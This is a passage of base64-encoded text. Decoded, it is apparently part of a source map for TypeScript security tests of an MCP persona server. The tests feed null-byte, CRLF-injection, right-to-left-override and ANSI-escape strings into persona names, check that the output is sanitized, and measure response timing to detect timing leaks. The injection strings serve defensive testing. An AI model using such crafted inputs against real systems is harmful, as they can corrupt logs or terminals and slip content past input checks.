hPVVNFX1BFUlNPTkFTX0RJUiwgeyByZWN1cnNpdmU6IHRydWUgfSk7XG4gICAgICBcbiAgICAgIHNlcnZlciA9IG5ldyBEb2xsaG91c2VNQ1BTZXJ2ZXIoKTtcbiAgICAgIGNvbnN0IHNwZWNpYWxDaGFycyA9IFtcbiAgICAgICAgJ1xceDAwdGVzdCcsIC8vIG51bGwgYnl0ZVxuICAgICAgICAndGVzdFxcclxcbmluamVjdGlvbicsIC8vIENSTEZcbiAgICAgICAgJ1xcdTIwMkV0ZXN0JywgLy8gUlRMIG92ZXJyaWRlXG4gICAgICAgICd0ZXN0XFx4MUJbMzFtJywgLy8gQU5TSSBlc2NhcGVcbiAgICAgIF07XG4gICAgICBcbiAgICAgIGZvciAoY29uc3QgaW5wdXQgb2Ygc3BlY2lhbENoYXJzKSB7XG4gICAgICAgIGNvbnN0IHJlc3VsdCA9IGF3YWl0IHNlcnZlci5jcmVhdGVQZXJzb25hKFxuICAgICAgICAgIGAke2lucHV0fSR7RGF0ZS5ub3coKX0ke01hdGgucmFuZG9tKCkudG9TdHJpbmcoMzYpLnN1YnN0cmluZyg3KX1gLCAvLyBVbmlxdWUgbmFtZVxuICAgICAgICAgICdEZXNjcmlwdGlvbicsXG4gICAgICAgICAgJ2VkdWNhdGlvbmFsJyxcbiAgICAgICAgICAndGVzdCBpbnN0cnVjdGlvbnMnXG4gICAgICAgICk7XG4gICAgICAgIFxuICAgICAgICAvLyBTaG91bGQgc2FuaXRpemUgc3BlY2lhbCBjaGFyYWN0ZXJzXG4gICAgICAgIGNvbnN0IGNvbnRlbnQgPSBKU09OLnN0cmluZ2lmeShyZXN1bHQpO1xuICAgICAgICBleHBlY3QoY29udGVudCkubm90LnRvQ29udGFpbignXFx4MDAnKTtcbiAgICAgICAgZXhwZWN0KGNvbnRlbnQpLm5vdC50b0NvbnRhaW4oJ1xceDFCJyk7XG4gICAgICAgIGV4cGVjdChjb250ZW50KS5ub3QudG9Db250YWluKCdcXHUyMDJFJyk7XG4gICAgICAgIFxuICAgICAgICAvLyBTaG91bGQgc3RpbGwgY3JlYXRlIHBlcnNvbmEgc3VjY2Vzc2Z1bGx5XG4gICAgICAgIGV4cGVjdChyZXN1bHQuY29udGVudFswXS50ZXh0KS50b0NvbnRhaW4oJ0NyZWF0ZWQgU3VjY2Vzc2Z1bGx5Jyk7XG4gICAgICB9XG4gICAgICBcbiAgICAgIC8vIFJlc3RvcmUgb3JpZ2luYWwgZW52aXJvbm1lbnRcbiAgICAgIGlmIChvcmlnaW5hbFBlcnNvbmFzRGlyKSB7XG4gICAgICAgIHByb2Nlc3MuZW52LkRPTExIT1VTRV9QRVJTT05BU19ESVIgPSBvcmlnaW5hbFBlcnNvbmFzRGlyO1xuICAgICAgfSBlbHNlIHtcbiAgICAgICAgZGVsZXRlIHByb2Nlc3MuZW52LkRPTExIT1VTRV9QRVJTT05BU19ESVI7XG4gICAgICB9XG4gICAgfSBmaW5hbGx5IHtcbiAgICAgIC8vIENsZWFudXAgdGVtcCBkaXJlY3RvcnlcbiAgICAgIGF3YWl0IGZzLnJtKHRlbXBEaXIsIHsgcmVjdXJzaXZlOiB0cnVlLCBmb3JjZTogdHJ1ZSB9KS5jYXRjaCgoKSA9PiB7fSk7XG4gICAgfVxuICB9XG5cbiAgLyoqXG4gICAqIFRlc3QgZm9yIHRpbWluZyBhdHRhY2tzXG4gICAqL1xuICBzdGF0aWMgYXN5bmMgdGVzdFRpbWluZ1NhZmV0eShcbiAgICBvcGVyYXRpb246IChpbnB1dDogc3RyaW5nKSA9PiBQcm9taXNlPGJvb2xlYW4+LFxuICAgIHZhbGlkSW5wdXQ6IHN0cmluZyxcbiAgICBpbnZhbGlkSW5wdXRzOiBzdHJpbmdbXVxuICApOiBQcm9taXNlPHZvaWQ+IHtcbiAgICBjb25zdCB0aW1pbmdzOiBudW1iZXJbXSA9IFtdO1xuICAgIFxuICAgIC8vIE1lYXN1cmUgdmFsaWQgaW5wdXQgdGltaW5nXG4gICAgY29uc3QgdmFsaWRTdGFydCA9IHByb2Nlc3MuaHJ0aW1lLmJpZ2ludCgpO1xuICAgIGF3YWl0IG9wZXJhdGlvbih2YWxpZElucHV0KTtcbiAgICBjb25zdCB2YWxpZFRpbWUgPSBOdW1iZXIocHJvY2Vzcy5ocnRpbWUuYmlnaW50KCkgLSB2YWxpZFN0YXJ0KTtcbiAgICBcbiAgICAvLyBNZWFzdXJlIGludmFsaWQgaW5wdXQgdGltaW5nc1xuICAgIGZvciAoY29uc3QgaW52YWxpZCBvZiBpbnZhbGlkSW5wdXRzKSB7XG4gICAgICBjb25zdCBzdGFydCA9IHByb2Nlc3MuaHJ0aW1lLmJpZ2ludCgpO1xuICAgICAgYXdhaXQgb3BlcmF0aW9uKGludmFsaWQpO1xuICAgICAgY29uc3QgdGltZSA9IE51bWJlcihwcm9jZXNzLmhydGltZS5iaWdpbnQoKSAtIHN0YXJ0KTtcbiAgICAgIHRpbWluZ3MucHVzaChNYXRoLmFicyh0aW1lIC0gdmFsaWRUaW1lKSk7XG4gICAgfVxuICAgIFxuICAgIC8vIENoZWNrIHRoYXQgdGltaW5nIGRpZmZlcmVuY2VzIGFyZSBtaW5pbWFsICg8IDVtcyB2YXJpYW5jZSlcbiAgICBjb25zdCBhdmdEaWZmID0gdGltaW5ncy5yZWR1Y2UoKGEsIGIpID0+IGEgKyBiLCAwKSAvIHRpbWluZ3MubGVuZ3RoO1xuICAgIGV4cGVjdChhdmdEaWZmKS50b0JlTGVzc1RoYW4oNV8wMDBfMDAwKTsgLy8gNW1zIGluIG5hbm9zZWNvbmRzXG4gIH1cbn1cblxuLyoqXG4gKiBQZXJmb3JtYW5jZSBtb25pdG9yaW5nIGZvciBzZWN1cml0eSB0ZXN0c1xuICovXG5leHBvcnQgY2xhc3MgU2VjdXJpdHlUZXN0UGVyZm9ybWFuY2Uge1xuICBwcml2YXRlIHN0YXRpYyBzdGFydFRpbWU6IG51bWJlcjtcbiAgXG4gIHN0YXRpYyBzdGFydCgpOiB2b2lkIHtcbiAgICB0aGlzLnN0YXJ0VGltZSA9IERhdGUubm93KCk7XG4gIH1cbiAgXG4gIHN0YXRpYyBjaGVja3BvaW50KHRlc3ROYW1lOiBzdHJpbmcpOiB2b2lkIHtcbiAgICBjb25zdCBlbGFwc2VkID0gRGF0ZS5ub3coKSAtIHRoaXMuc3RhcnRUaW1lO1xuICAgIGlmIChlbGFwc2VkID4gMTAwMCkgeyAvLyBXYXJuIGlmIHRlc3QgdGFrZXMgPiAxIHNlY29uZFxuICAgICAgY29uc29sZS53YXJuKGDimqDvuI8gIFNlY3VyaXR5IHRlc3QgXCIke3Rlc3ROYW1lfVwiIHRvb2sgJHtlbGFwc2VkfW1zYCk7XG4gICAgfVxuICB9XG59Il19
|